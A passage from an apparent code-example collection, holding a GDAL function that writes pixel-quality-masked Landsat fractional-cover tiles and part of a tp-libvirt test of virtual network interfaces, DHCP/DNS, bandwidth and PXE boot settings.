    'tile_pathname': '/g/data/v10/datacube/EPSG4326_1deg_0.00025pixel/LS7_ETM/150_-025/2000/LS7_ETM_FC_150_-025_2000-02-09T23-46-12.722217.tif',
    'x_index': 150,
    'y_index': -25},
'ORTHO': {'band_name': 'Thermal Infrared (Low Gain)',
     'band_tag': 'B61',
     'end_datetime': datetime.datetime(2000, 2, 9, 23, 46, 36, 722217),
     'end_row': 77,
     'level_name': 'ORTHO',
     'nodata_value': 0L,
     'path': 91,
     'satellite_tag': 'LS7',
     'sensor_name': 'ETM+',
     'start_datetime': datetime.datetime(2000, 2, 9, 23, 46, 12, 722217),
     'start_row': 77,
     'tile_layer': 1,
     'tile_pathname': '/g/data/v10/datacube/EPSG4326_1deg_0.00025pixel/LS7_ETM/150_-025/2000/LS7_ETM_ORTHO_150_-025_2000-02-09T23-46-12.722217.tif',
     'x_index': 150,
     'y_index': -25},
'PQA': {'band_name': 'Pixel Quality Assurance',
    'band_tag': 'PQA',
    'end_datetime': datetime.datetime(2000, 2, 9, 23, 46, 36, 722217),
    'end_row': 77,
    'level_name': 'PQA',
    'nodata_value': None,
    'path': 91,
    'satellite_tag': 'LS7',
    'sensor_name': 'ETM+',
    'start_datetime': datetime.datetime(2000, 2, 9, 23, 46, 12, 722217),
    'start_row': 77,
    'tile_layer': 1,
    'tile_pathname': '/g/data/v10/datacube/EPSG4326_1deg_0.00025pixel/LS7_ETM/150_-025/2000/LS7_ETM_PQA_150_-025_2000-02-09T23-46-12.722217.tif,
    'x_index': 150,
    'y_index': -25}
}                
                
        Arguments (Cont'd):
            stack_output_info: dict containing stack output information. 
                Obtained from stacker object. 
                A sample is shown below
                
stack_output_info = {'x_index': 144, 
                      'y_index': -36,
                      'stack_output_dir': '/g/data/v10/tmp/ndvi',
                      'start_datetime': None, # Datetime object or None
                      'end_datetime': None, # Datetime object or None 
                      'satellite': None, # String or None 
                      'sensor': None} # String or None 
                      
        Arguments (Cont'd):
            tile_type_info: dict containing tile type information. 
                Obtained from stacker object (e.g: stacker.tile_type_dict[tile_type_id]). 
                A sample is shown below
                
{'crs': 'EPSG:4326',
    'file_extension': '.tif',
    'file_format': 'GTiff',
    'format_options': 'COMPRESS=LZW,BIGTIFF=YES',
    'tile_directory': 'EPSG4326_1deg_0.00025pixel',
    'tile_type_id': 1L,
    'tile_type_name': 'Unprojected WGS84 1-degree at 4000 pixels/degree',
    'unit': 'degree',
    'x_origin': 0.0,
    'x_pixel_size': Decimal('0.00025000000000000000'),
    'x_pixels': 4000L,
    'x_size': 1.0,
    'y_origin': 0.0,
    'y_pixel_size': Decimal('0.00025000000000000000'),
    'y_pixels': 4000L,
    'y_size': 1.0}
                            
        Function must create one or more GDAL-supported output datasets. Useful functions in the
        Stacker class include Stacker.get_pqa_mask(), but it is left to the coder to produce exactly
        what is required for a single slice of the temporal stack of derived quantities.
            
        Returns:
            output_dataset_info: Dict keyed by stack filename
                containing metadata info for GDAL-supported output datasets created by this function.
                Note that the key(s) will be used as the output filename for the VRT temporal stack
                and each dataset created must contain only a single band. An example is as follows:
{'/g/data/v10/tmp/ndvi/NDVI_stack_150_-025.vrt': 
    {'band_name': 'Normalised Differential Vegetation Index with PQA applied',
    'band_tag': 'NDVI',
    'end_datetime': datetime.datetime(2000, 2, 9, 23, 46, 36, 722217),
    'end_row': 77,
    'level_name': 'NDVI',
    'nodata_value': None,
    'path': 91,
    'satellite_tag': 'LS7',
    'sensor_name': 'ETM+',
    'start_datetime': datetime.datetime(2000, 2, 9, 23, 46, 12, 722217),
    'start_row': 77,
    'tile_layer': 1,
    'tile_pathname': '/g/data/v10/tmp/ndvi/LS7_ETM_NDVI_150_-025_2000-02-09T23-46-12.722217.tif',
    'x_index': 150,
    'y_index': -25}
}
        """
        assert type(input_dataset_dict) == dict, 'input_dataset_dict must be a dict'
        
        def create_rgb_tif(input_dataset_path, output_dataset_path, pqa_mask=None, rgb_bands=None, 
                           input_no_data_value=-999, output_no_data_value=0,
                           input_range=()):
            if os.path.exists(output_dataset_path):
                logger.info('Output dataset %s already exists - skipping', output_dataset_path)
                return
            
            if not self.lock_object(output_dataset_path):
                logger.info('Output dataset %s already locked - skipping', output_dataset_path)
                return
            
            if not rgb_bands:
                rgb_bands = [3, 1, 2]
                
            scale_factor = 10000.0 / 255.0 # Scale factor to translate from +ve int16 to byte
            
            input_gdal_dataset = gdal.Open(input_dataset_path) 
            assert input_gdal_dataset, 'Unable to open input dataset %s' % (input_dataset_path)
        
            try:
                # Create multi-band dataset for masked data
                logger.debug('output_dataset path = %s', output_dataset_path)
                gdal_driver = gdal.GetDriverByName('GTiff')
                log_multiline(logger.debug, gdal_driver.GetMetadata(), 'gdal_driver.GetMetadata()')
                output_gdal_dataset = gdal_driver.Create(output_dataset_path, 
                    input_gdal_dataset.RasterXSize, input_gdal_dataset.RasterYSize,
                    len(rgb_bands), gdal.GDT_Byte, ['INTERLEAVE=PIXEL']) #['INTERLEAVE=PIXEL','COMPRESS=NONE','BIGTIFF=YES'])
                assert output_gdal_dataset, 'Unable to open input dataset %s' % output_dataset_path
                output_gdal_dataset.SetGeoTransform(input_gdal_dataset.GetGeoTransform())
                output_gdal_dataset.SetProjection(input_gdal_dataset.GetProjection())
                
                dest_band_no = 0
                for source_band_no in rgb_bands:
                    dest_band_no += 1  
                    logger.debug('Processing source band %d, destination band %d', source_band_no, dest_band_no)
                    input_band_array = input_gdal_dataset.GetRasterBand(source_band_no).ReadAsArray()
                    input_gdal_dataset.FlushCache()
                    
                    output_band_array = (input_band_array / scale_factor).astype(numpy.byte)
                    
                    output_band_array[numpy.logical_or((input_band_array < 0), (input_band_array > 10000))] = output_no_data_value # Set any out-of-bounds values to no-data
                    
                    if pqa_mask is not None: # Need to perform masking
                        output_band_array[numpy.logical_or((input_band_array == input_no_data_value), ~pqa_mask)] = output_no_data_value # Apply PQA mask and no-data value
                    else:
                        output_band_array[(input_band_array == input_no_data_value)] = output_no_data_value # Re-apply no-data value
                    
                    output_band = output_gdal_dataset.GetRasterBand(dest_band_no)
                    output_band.SetNoDataValue(output_no_data_value)
                    output_band.WriteArray(output_band_array)
                    output_band.FlushCache()
                    
                output_gdal_dataset.FlushCache()
            finally:
                self.unlock_object(output_dataset_path)



                
        dtype = {'FC_PV' : gdalconst.GDT_Int16,
                 'FC_NPV' : gdalconst.GDT_Int16,
                 'FC_BS' : gdalconst.GDT_Int16}

        no_data_value = {'FC_PV' : -999,
                         'FC_NPV' : -999,
                         'FC_BS' : -999}
    
        log_multiline(logger.debug, input_dataset_dict, 'input_dataset_dict', '\t')    
       
        # Test function to copy ORTHO & FC band datasets with pixel quality mask applied
        # to an output directory for stacking

        output_dataset_dict = {}
        fc_dataset_info = input_dataset_dict['FC'] # Only need FC data for NDVI
        #thermal_dataset_info = input_dataset_dict['ORTHO'] # Could have one or two thermal bands
        
        if fc_dataset_info is None:
            logger.info('FC dataset does not exist')
            return 
        
        fc_dataset_path = fc_dataset_info['tile_pathname']
        
        if input_dataset_dict['PQA'] is None:
            logger.info('PQA dataset for %s does not exist', fc_dataset_path)
            return 
        
        # Get a boolean mask from the PQA dataset (use default parameters for mask and dilation)
        pqa_mask = self.get_pqa_mask(input_dataset_dict['PQA']['tile_pathname']) 
        
        fc_dataset = gdal.Open(fc_dataset_path)
        assert fc_dataset, 'Unable to open dataset %s' % fc_dataset
        
        band_array = None;
        # List of outputs to generate from each file
        output_tag_list = ['FC_PV', 'FC_NPV', 'FC_BS']
        input_band_index = 0
        for output_tag in output_tag_list: 
        # List of outputs to generate from each file
            # TODO: Make the stack file name reflect the date range                    
            output_stack_path = os.path.join(self.output_dir, 
                                             re.sub('\+', '', '%s_%+04d_%+04d' % (output_tag,
                                                                                   stack_output_info['x_index'],
                                                                                    stack_output_info['y_index'])))
                                                                                    
            if stack_output_info['start_datetime']:
                output_stack_path += '_%s' % stack_output_info['start_datetime'].strftime('%Y%m%d')
            if stack_output_info['end_datetime']:
                output_stack_path += '_%s' % stack_output_info['end_datetime'].strftime('%Y%m%d')
                
            output_stack_path += '_pqa_stack.vrt'
            
            output_tile_path = os.path.join(self.output_dir, re.sub('\.\w+$', tile_type_info['file_extension'],
                                                                    re.sub('FC', 
                                                                           output_tag,
                                                                           os.path.basename(fc_dataset_path)
                                                                           )
                                                                   )
                                           )
                
            # Copy metadata for eventual inclusion in stack file output
            # This could also be written to the output tile if required
            output_dataset_info = dict(fc_dataset_info)
            output_dataset_info['tile_pathname'] = output_tile_path # This is the most important modification - used to find tiles to stack
            output_dataset_info['band_name'] = '%s with PQA mask applied' % output_tag
            output_dataset_info['band_tag'] = '%s-PQA' % output_tag
            output_dataset_info['tile_layer'] = 1
            output_dataset_info['nodata_value'] = no_data_value[output_tag]

            # Check for existing, valid file
            if self.refresh or not os.path.exists(output_tile_path):

                if self.lock_object(output_tile_path): # Test for concurrent writes to the same file
                    try:
                        # Read whole fc_dataset into one array. 
                        # 62MB for float32 data should be OK for memory depending on what else happens downstream
                        if band_array is None:
                            band_array = fc_dataset.ReadAsArray()

                            # Re-project issues with PQ. REDO the contiguity layer.
                            non_contiguous = (band_array < 0).any(0)
                            pqa_mask[non_contiguous] = False
                                                
                        gdal_driver = gdal.GetDriverByName(tile_type_info['file_format'])
                        #output_dataset = gdal_driver.Create(output_tile_path, 
                        #                                    fc_dataset.RasterXSize, fc_dataset.RasterYSize,
                        #                                    1, fc_dataset.GetRasterBand(1).DataType,
                        #                                    tile_type_info['format_options'].split(','))
                        output_dataset = gdal_driver.Create(output_tile_path, 
                                                            fc_dataset.RasterXSize, fc_dataset.RasterYSize,
                                                            1, dtype[output_tag],
                                                            tile_type_info['format_options'].split(','))
                        assert output_dataset, 'Unable to open output dataset %s'% output_dataset                                   
                        output_dataset.SetGeoTransform(fc_dataset.GetGeoTransform())
                        output_dataset.SetProjection(fc_dataset.GetProjection()) 
            
                        output_band = output_dataset.GetRasterBand(1)
            
                        # Calculate each output here
                        # Remember band_array indices are zero-based

                        data_array = band_array[input_band_index].copy()
                                            
                        if no_data_value[output_tag]:
                            self.apply_pqa_mask(data_array=data_array, pqa_mask=pqa_mask, no_data_value=no_data_value[output_tag])
                        
                        gdal_driver = gdal.GetDriverByName(tile_type_info['file_format'])
                        #output_dataset = gdal_driver.Create(output_tile_path, 
                        #                                    fc_dataset.RasterXSize, fc_dataset.RasterYSize,
                        #                                    1, fc_dataset.GetRasterBand(1).DataType,
                        #                                    tile_type_info['format_options'].split(','))
                        output_dataset = gdal_driver.Create(output_tile_path, 
                                                            fc_dataset.RasterXSize, fc_dataset.RasterYSize,
                                                            1, dtype[output_tag],
                                                            tile_type_info['format_options'].split(','))
                        assert output_dataset, 'Unable to open output dataset %s'% output_dataset                                   
                        output_dataset.SetGeoTransform(fc_dataset.GetGeoTransform())
                        output_dataset.SetProjection(fc_dataset.GetProjection()) 
            
                        output_band = output_dataset.GetRasterBand(1)
            
                        output_band.WriteArray(data_array)
                        output_band.SetNoDataValue(output_dataset_info['nodata_value'])
                        output_band.FlushCache()
                        
                        # This is not strictly necessary - copy metadata to output dataset
                        output_dataset_metadata = fc_dataset.GetMetadata()
                        if output_dataset_metadata:
                            output_dataset.SetMetadata(output_dataset_metadata) 
                            log_multiline(logger.debug, output_dataset_metadata, 'output_dataset_metadata', '\t')    
                        
                        output_dataset.FlushCache()
                        logger.info('Finished writing dataset %s', output_tile_path)
                    finally:
                        self.unlock_object(output_tile_path)
                else:
                    logger.info('Skipped locked dataset %s', output_tile_path)
                    sleep(5) #TODO: Find a nicer way of dealing with contention for the same output tile
                    
            else:
                logger.info('Skipped existing dataset %s', output_tile_path)
        
            output_dataset_dict[output_stack_path] = output_dataset_info
            input_band_index += 1
#                    log_multiline(logger.debug, output_dataset_info, 'output_dataset_info', '\t') 
            # End of loop  
 
        fc_rgb_path = os.path.join(self.output_dir, re.sub('\.\w+$', '.tif', # Write to .tif file
                                                                re.sub('^LS\d_[^_]+_', '', # Remove satellite & sensor reference to allow proper sorting by filename
                                                                       re.sub('FC', # Write to FC_RGB file
                                                                              'FC_RGB',
                                                                              os.path.basename(fc_dataset_path)
                                                                              )
                                                                       )
                                                               )
                                       )
                
        logger.info('Creating FC RGB output file %s', fc_rgb_path)
        create_rgb_tif(input_dataset_path=fc_dataset_path, output_dataset_path=fc_rgb_path, pqa_mask=pqa_mask)
        
        log_multiline(logger.debug, output_dataset_dict, 'output_dataset_dict', '\t')    

        # Datasets processed - return info
        return output_dataset_dict

Example 119

Project: tp-libvirt
Source File: iface_network.py
View license
def run(test, params, env):
    """
    Test interafce xml options.

    1.Prepare test environment,destroy or suspend a VM.
    2.Edit xml and start the domain.
    3.Perform test operation.
    4.Recover test environment.
    5.Confirm the test result.
    """
    vm_name = params.get("main_vm")
    vm = env.get_vm(vm_name)

    def prepare_pxe_boot():
        """
        Prepare tftp server and pxe boot files
        """
        pkg_list = ["syslinux", "tftp-server",
                    "tftp", "ipxe-roms-qemu", "wget"]
        # Try to install required packages
        if not utils_misc.yum_install(pkg_list):
            raise error.TestError("Failed ot install "
                                  "required packages")
        boot_initrd = params.get("boot_initrd", "EXAMPLE_INITRD")
        boot_vmlinuz = params.get("boot_vmlinuz", "EXAMPLE_VMLINUZ")
        if boot_initrd.count("EXAMPLE") or boot_vmlinuz.count("EXAMPLE"):
            raise error.TestNAError("Please provide initrd/vmlinuz URL")
        # Download pxe boot images
        utils.run("wget %s -O %s/initrd.img"
                  % (boot_initrd, tftp_root))
        utils.run("wget %s -O %s/vmlinuz"
                  % (boot_vmlinuz, tftp_root))
        utils.run("cp -f /usr/share/syslinux/pxelinux.0 {0};"
                  " mkdir -m 777 -p {0}/pxelinux.cfg".format(tftp_root))
        pxe_file = "%s/pxelinux.cfg/default" % tftp_root
        boot_txt = """
DISPLAY boot.txt
DEFAULT rhel
LABEL rhel
        kernel vmlinuz
        append initrd=initrd.img
PROMPT 1
TIMEOUT 3"""
        with open(pxe_file, 'w') as p_file:
            p_file.write(boot_txt)

    def modify_iface_xml():
        """
        Modify interface xml options
        """
        vmxml = vm_xml.VMXML.new_from_dumpxml(vm_name)
        if pxe_boot:
            # Config boot console for pxe boot
            osxml = vm_xml.VMOSXML()
            osxml.type = vmxml.os.type
            osxml.arch = vmxml.os.arch
            osxml.machine = vmxml.os.machine
            osxml.loader = "/usr/share/seabios/bios.bin"
            osxml.bios_useserial = "yes"
            osxml.bios_reboot_timeout = "-1"
            osxml.boots = ['network']
            del vmxml.os
            vmxml.os = osxml

        xml_devices = vmxml.devices
        iface_index = xml_devices.index(
            xml_devices.by_device_tag("interface")[0])
        iface = xml_devices[iface_index]
        iface_bandwidth = {}
        iface_inbound = ast.literal_eval(iface_bandwidth_inbound)
        iface_outbound = ast.literal_eval(iface_bandwidth_outbound)
        if iface_inbound:
            iface_bandwidth["inbound"] = iface_inbound
        if iface_outbound:
            iface_bandwidth["outbound"] = iface_outbound
        if iface_bandwidth:
            bandwidth = iface.new_bandwidth(**iface_bandwidth)
            iface.bandwidth = bandwidth

        iface_type = params.get("iface_type", "network")
        iface.type_name = iface_type
        source = ast.literal_eval(iface_source)
        if not source:
            source = {"network": "default"}
        net_ifs = utils_net.get_net_if(state="UP")
        # Check source device is valid or not,
        # if it's not in host interface list, try to set
        # source device to first active interface of host
        if (iface.type_name == "direct" and
            source.has_key('dev') and
                source['dev'] not in net_ifs):
            logging.warn("Source device %s is not a interface"
                         " of host, reset to %s",
                         source['dev'], net_ifs[0])
            source['dev'] = net_ifs[0]
        del iface.source
        iface.source = source
        iface_model = params.get("iface_model", "virtio")
        iface.model = iface_model
        logging.debug("New interface xml file: %s", iface)
        vmxml.devices = xml_devices
        vmxml.xmltreefile.write()
        vmxml.sync()

    def run_dnsmasq_default_test(key, value=None, exists=True):
        """
        Test dnsmasq configuration.
        """
        conf_file = "/var/lib/libvirt/dnsmasq/default.conf"
        if not os.path.exists(conf_file):
            raise error.TestNAError("Can't find default.conf file")

        configs = ""
        with open(conf_file) as f:
            configs = f.read()
        logging.debug("configs in file %s: %s", conf_file, configs)
        if value:
            config = "%s=%s" % (key, value)
        else:
            config = key

        if not configs.count(config):
            if exists:
                raise error.TestFail("Can't find %s=%s in configuration"
                                     " file" % (key, value))
        else:
            if not exists:
                raise error.TestFail("Found %s=%s in configuration"
                                     " file" % (key, value))

    def run_dnsmasq_addnhosts_test(hostip, hostnames):
        """
        Test host ip and names configuration
        """
        conf_file = "/var/lib/libvirt/dnsmasq/default.addnhosts"
        hosts_re = ".*".join(hostnames)
        configs = ""
        with open(conf_file) as f:
            configs = f.read()
        logging.debug("configs in file %s: %s", conf_file, configs)
        if not re.search(r"%s.*%s" % (hostip, hosts_re), configs, re.M):
            raise error.TestFail("Can't find '%s' in configuration"
                                 " file" % hostip)

    def run_dnsmasq_host_test(iface_mac, guest_ip, guest_name):
        """
        Test host name and ip configuration for dnsmasq
        """
        conf_file = "/var/lib/libvirt/dnsmasq/default.hostsfile"
        config = "%s,%s,%s" % (iface_mac, guest_ip, guest_name)
        configs = ""
        with open(conf_file) as f:
            configs = f.read()
        logging.debug("configs in file %s: %s", conf_file, configs)
        if not configs.count(config):
            raise error.TestFail("Can't find host configuration"
                                 " in file %s" % conf_file)

    def check_class_rules(ifname, rule_id, bandwidth):
        """
        Check bandwidth settings via 'tc class' output
        """
        cmd = "tc class show dev %s" % ifname
        class_output = utils.run(cmd).stdout
        logging.debug("Bandwidth class output: %s", class_output)
        class_pattern = (r"class htb %s.*rate (\d+)Kbit ceil"
                         " (\d+)Kbit burst (\d+)(K?M?)b.*" % rule_id)
        se = re.search(class_pattern, class_output, re.M)
        if not se:
            raise error.TestFail("Can't find outbound setting"
                                 " for htb %s" % rule_id)
        logging.debug("bandwidth from tc output:%s" % str(se.groups()))
        ceil = None
        if bandwidth.has_key("floor"):
            ceil = int(bandwidth["floor"]) * 8
        elif bandwidth.has_key("average"):
            ceil = int(bandwidth["average"]) * 8
        if ceil:
            assert int(se.group(1)) == ceil
        if bandwidth.has_key("peak"):
            assert int(se.group(2)) == int(bandwidth["peak"]) * 8
        if bandwidth.has_key("burst"):
            if se.group(4) == 'M':
                tc_burst = int(se.group(3)) * 1024
            else:
                tc_burst = int(se.group(3))
            assert tc_burst == int(bandwidth["burst"])

    def check_filter_rules(ifname, bandwidth):
        """
        Check bandwidth settings via 'tc filter' output
        """
        cmd = "tc -d filter show dev %s parent ffff:" % ifname
        filter_output = utils.run(cmd).stdout
        logging.debug("Bandwidth filter output: %s", filter_output)
        if not filter_output.count("filter protocol all pref"):
            raise error.TestFail("Can't find 'protocol all' settings"
                                 " in filter rules")
        filter_pattern = ".*police.*rate (\d+)Kbit burst (\d+)(K?M?)b.*"
        se = re.search(r"%s" % filter_pattern, filter_output, re.M)
        if not se:
            raise error.TestFail("Can't find any filter policy")
        logging.debug("bandwidth from tc output:%s" % str(se.groups()))
        logging.debug("bandwidth from setting:%s" % str(bandwidth))
        if bandwidth.has_key("average"):
            assert int(se.group(1)) == int(bandwidth["average"]) * 8
        if bandwidth.has_key("burst"):
            if se.group(3) == 'M':
                tc_burst = int(se.group(2)) * 1024
            else:
                tc_burst = int(se.group(2))
            assert tc_burst == int(bandwidth["burst"])

    def check_host_routes():
        """
        Check network routes on host
        """
        for rt in routes:
            try:
                route = ast.literal_eval(rt)
                addr = "%s/%s" % (route["address"], route["prefix"])
                cmd = "ip route list %s" % addr
                if route.has_key("family") and route["family"] == "ipv6":
                    cmd = "ip -6 route list %s" % addr
                output = utils.run(cmd).stdout
                match_obj = re.search(r"via (\S+).*metric (\d+)", output)
                if match_obj:
                    via_addr = match_obj.group(1)
                    metric = match_obj.group(2)
                    logging.debug("via address %s for %s, matric is %s"
                                  % (via_addr, addr, metric))
                    assert via_addr == route["gateway"]
                    if route.has_key("metric"):
                        assert metric == route["metric"]
            except KeyError:
                pass

    def run_bandwidth_test(check_net=False, check_iface=False):
        """
        Test bandwidth option for network or interface by tc command.
        """
        iface_inbound = ast.literal_eval(iface_bandwidth_inbound)
        iface_outbound = ast.literal_eval(iface_bandwidth_outbound)
        net_inbound = ast.literal_eval(net_bandwidth_inbound)
        net_outbound = ast.literal_eval(net_bandwidth_outbound)
        net_bridge_name = ast.literal_eval(net_bridge)["name"]
        iface_name = libvirt.get_ifname_host(vm_name, iface_mac)

        try:
            if check_net and net_inbound:
                # Check qdisc rules
                cmd = "tc -d qdisc show dev %s" % net_bridge_name
                qdisc_output = utils.run(cmd).stdout
                logging.debug("Bandwidth qdisc output: %s", qdisc_output)
                if not qdisc_output.count("qdisc ingress ffff:"):
                    raise error.TestFail("Can't find ingress setting")
                check_class_rules(net_bridge_name, "1:1",
                                  {"average": net_inbound["average"],
                                   "peak": net_inbound["peak"]})
                check_class_rules(net_bridge_name, "1:2", net_inbound)

            # Check filter rules on bridge interface
            if check_net and net_outbound:
                check_filter_rules(net_bridge_name, net_outbound)

            # Check class rules on interface inbound settings
            if check_iface and iface_inbound:
                check_class_rules(iface_name, "1:1",
                                  {'average': iface_inbound['average'],
                                   'peak': iface_inbound['peak'],
                                   'burst': iface_inbound['burst']})
                if iface_inbound.has_key("floor"):
                    if not libvirt_version.version_compare(1, 0, 1):
                        raise error.TestNAError("Not supported Qos"
                                                " options 'floor'")

                    check_class_rules(net_bridge_name, "1:3",
                                      {'floor': iface_inbound["floor"]})

            # Check filter rules on interface outbound settings
            if check_iface and iface_outbound:
                check_filter_rules(iface_name, iface_outbound)
        except AssertionError:
            utils.log_last_traceback()
            raise error.TestFail("Failed to check network bandwidth")

    def check_name_ip(session):
        """
        Check dns resolving on guest
        """
        # Check if bind-utils is installed
        if not utils_misc.yum_install(['bind-utils'], session):
            raise error.TestError("Failed to install bind-utils"
                                  " on guest")
        # Run host command to check if hostname can be resolved
        if not guest_ipv4 and not guest_ipv6:
            raise error.TestFail("No ip address found from parameters")
        guest_ip = guest_ipv4 if guest_ipv4 else guest_ipv6
        cmd = "host %s | grep %s" % (guest_name, guest_ip)
        if session.cmd_status(cmd):
            raise error.TestFail("Can't resolve name %s on guest" %
                                 guest_name)

    def check_ipt_rules(check_ipv4=True, check_ipv6=False):
        """
        Check iptables for network/interface
        """
        br_name = ast.literal_eval(net_bridge)["name"]
        net_forward = ast.literal_eval(params.get("net_forward", "{}"))
        net_ipv4 = params.get("net_ipv4")
        net_ipv6 = params.get("net_ipv6")
        ipt_rules = ("FORWARD -i {0} -o {0} -j ACCEPT".format(br_name),
                     "FORWARD -o %s -j REJECT --reject-with icmp" % br_name,
                     "FORWARD -i %s -j REJECT --reject-with icmp" % br_name)
        net_dev_in = ""
        net_dev_out = ""
        if net_forward.has_key("dev"):
            net_dev_in = " -i %s" % net_forward["dev"]
            net_dev_out = " -o %s" % net_forward["dev"]
        if check_ipv4:
            ipv4_rules = list(ipt_rules)
            ctr_rule = ""
            nat_rules = []
            if net_forward.has_key("mode") and net_forward["mode"] == "nat":
                nat_port = ast.literal_eval(params.get("nat_port"))
                p_start = nat_port["start"]
                p_end = nat_port["end"]
                ctr_rule = " -m .* RELATED,ESTABLISHED"
                nat_rules = [("POSTROUTING -s {0} ! -d {0} -p tcp -j MASQUERADE"
                              " --to-ports {1}-{2}".format(net_ipv4, p_start, p_end)),
                             ("POSTROUTING -s {0} ! -d {0} -p udp -j MASQUERADE"
                              " --to-ports {1}-{2}".format(net_ipv4, p_start, p_end)),
                             ("POSTROUTING -s {0} ! -d {0} -p udp"
                              " -j MASQUERADE".format(net_ipv4))]
            if nat_rules:
                ipv4_rules.extend(nat_rules)
            if (net_ipv4 and net_forward.has_key("mode") and
                    net_forward["mode"] in ["nat", "route"]):
                rules = [("FORWARD -d %s%s -o %s%s -j ACCEPT"
                          % (net_ipv4, net_dev_in, br_name, ctr_rule)),
                         ("FORWARD -s %s -i %s%s -j ACCEPT"
                          % (net_ipv4, br_name, net_dev_out))]
                ipv4_rules.extend(rules)

            output = utils.run("iptables-save").stdout.strip()
            logging.debug("iptables: %s", output)
            for ipt in ipv4_rules:
                if not re.findall(r"%s" % ipt, output, re.M):
                    raise error.TestFail("Can't find iptable rule:\n%s" % ipt)
        if check_ipv6:
            ipv6_rules = list(ipt_rules)
            if (net_ipv6 and net_forward.has_key("mode") and
                    net_forward["mode"] in ["nat", "route"]):
                rules = [("FORWARD -d %s%s -o %s -j ACCEPT"
                          % (net_ipv6, net_dev_in, br_name)),
                         ("FORWARD -s %s -i %s%s -j ACCEPT"
                          % (net_ipv6, br_name, net_dev_out))]
                ipv6_rules.extend(rules)
            output = utils.run("ip6tables-save").stdout.strip()
            logging.debug("iptables: %s", output)
            for ipt in ipv6_rules:
                if not output.count(ipt):
                    raise error.TestFail("Can't find ipbtable rule:\n%s" % ipt)

    def run_ip_test(session, ip_ver):
        """
        Check iptables on host and ipv6 address on guest
        """
        if ip_ver == "ipv6":
            # Clean up iptables rules for guest to get ipv6 address
            session.cmd_status("ip6tables -F")

        # It may take some time to get the ip address
        def get_ip_func():
            return utils_net.get_guest_ip_addr(session, iface_mac,
                                               ip_version=ip_ver)
        utils_misc.wait_for(get_ip_func, 5)
        if not get_ip_func():
            utils_net.restart_guest_network(session, iface_mac,
                                            ip_version=ip_ver)
            utils_misc.wait_for(get_ip_func, 5)
        vm_ip = get_ip_func()
        logging.debug("Guest has ip: %s", vm_ip)
        if not vm_ip:
            raise error.TestFail("Can't find ip address on guest")
        ip_gateway = net_ip_address
        if ip_ver == "ipv6":
            ip_gateway = net_ipv6_address
            # Cleanup ip6talbes on host for ping6 test
            utils.run("ip6tables -F")
        if ip_gateway and not routes:
            ping_s, _ = ping(dest=ip_gateway, count=5,
                             timeout=10, session=session)
            if ping_s:
                raise error.TestFail("Failed to ping gateway address: %s"
                                     % ip_gateway)

    def run_guest_libvirt(session):
        """
        Check guest libvirt network
        """
        # Try to install required packages
        if not utils_misc.yum_install(['libvirt'], session):
            raise error.TestError("Failed ot install libvirt"
                                  " package on guest")
        result = True
        # Try to load tun module first
        session.cmd("lsmod | grep tun || modprobe  tun")
        # Check network state on guest
        cmd = ("service libvirtd restart; virsh net-info default"
               " | grep 'Active:.*no'")
        if session.cmd_status(cmd):
            result = False
            logging.error("Default network isn't in inactive state")
        # Try to start default network on guest, check error messages
        if result:
            cmd = "virsh net-start default"
            status, output = session.cmd_status_output(cmd)
            logging.debug("Run command on guest exit %s, output %s"
                          % (status, output))
            if not status or not output.count("already in use"):
                result = False
                logging.error("Failed to see network messges on guest")
        if session.cmd_status("yum -y remove libvirt*"):
            logging.error("Failed to remove libvirt packages on guest")

        if not result:
            raise error.TestFail("Check libvirt network on guest failed")

    start_error = "yes" == params.get("start_error", "no")
    define_error = "yes" == params.get("define_error", "no")
    restart_error = "yes" == params.get("restart_error", "no")

    # network specific attributes.
    net_name = params.get("net_name", "default")
    net_bridge = params.get("net_bridge", "{'name':'virbr0'}")
    net_domain = params.get("net_domain")
    net_ip_address = params.get("net_ip_address")
    net_ipv6_address = params.get("net_ipv6_address")
    net_dns_forward = params.get("net_dns_forward")
    net_dns_txt = params.get("net_dns_txt")
    net_dns_srv = params.get("net_dns_srv")
    net_dns_hostip = params.get("net_dns_hostip")
    net_dns_hostnames = params.get("net_dns_hostnames", "").split()
    dhcp_start_ipv4 = params.get("dhcp_start_ipv4")
    dhcp_end_ipv4 = params.get("dhcp_end_ipv4")
    guest_name = params.get("guest_name")
    guest_ipv4 = params.get("guest_ipv4")
    guest_ipv6 = params.get("guest_ipv6")
    tftp_root = params.get("tftp_root")
    pxe_boot = "yes" == params.get("pxe_boot", "no")
    routes = params.get("routes", "").split()
    net_bandwidth_inbound = params.get("net_bandwidth_inbound", "{}")
    net_bandwidth_outbound = params.get("net_bandwidth_outbound", "{}")
    iface_bandwidth_inbound = params.get("iface_bandwidth_inbound", "{}")
    iface_bandwidth_outbound = params.get("iface_bandwidth_outbound", "{}")
    iface_num = params.get("iface_num", "1")
    iface_source = params.get("iface_source", "{}")
    multiple_guests = params.get("multiple_guests")
    create_network = "yes" == params.get("create_network", "no")
    attach_iface = "yes" == params.get("attach_iface", "no")
    serial_login = "yes" == params.get("serial_login", "no")
    change_iface_option = "yes" == params.get("change_iface_option", "no")
    test_bridge = "yes" == params.get("test_bridge", "no")
    test_dnsmasq = "yes" == params.get("test_dnsmasq", "no")
    test_dhcp_range = "yes" == params.get("test_dhcp_range", "no")
    test_dns_host = "yes" == params.get("test_dns_host", "no")
    test_qos_bandwidth = "yes" == params.get("test_qos_bandwidth", "no")
    test_pg_bandwidth = "yes" == params.get("test_portgroup_bandwidth", "no")
    test_qos_remove = "yes" == params.get("test_qos_remove", "no")
    test_ipv4_address = "yes" == params.get("test_ipv4_address", "no")
    test_ipv6_address = "yes" == params.get("test_ipv6_address", "no")
    test_guest_libvirt = "yes" == params.get("test_guest_libvirt", "no")
    username = params.get("username")
    password = params.get("password")

    # Destroy VM first
    if vm.is_alive():
        vm.destroy(gracefully=False)

    # Back up xml file.
    netxml_backup = NetworkXML.new_from_net_dumpxml("default")
    iface_mac = vm_xml.VMXML.get_first_mac_by_name(vm_name)
    params["guest_mac"] = iface_mac
    vmxml_backup = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)
    vms_list = []
    if "floor" in ast.literal_eval(iface_bandwidth_inbound):
        if not libvirt_version.version_compare(1, 0, 1):
            raise error.TestNAError("Not supported Qos"
                                    " options 'floor'")

    # Build the xml and run test.
    try:
        if test_dnsmasq:
            # Check the settings before modifying network xml
            if net_dns_forward == "no":
                run_dnsmasq_default_test("domain-needed", exists=False)
                run_dnsmasq_default_test("local", "//", exists=False)
            if net_domain:
                run_dnsmasq_default_test("domain", net_domain, exists=False)
                run_dnsmasq_default_test("expand-hosts", exists=False)

        # Prepare pxe boot directory
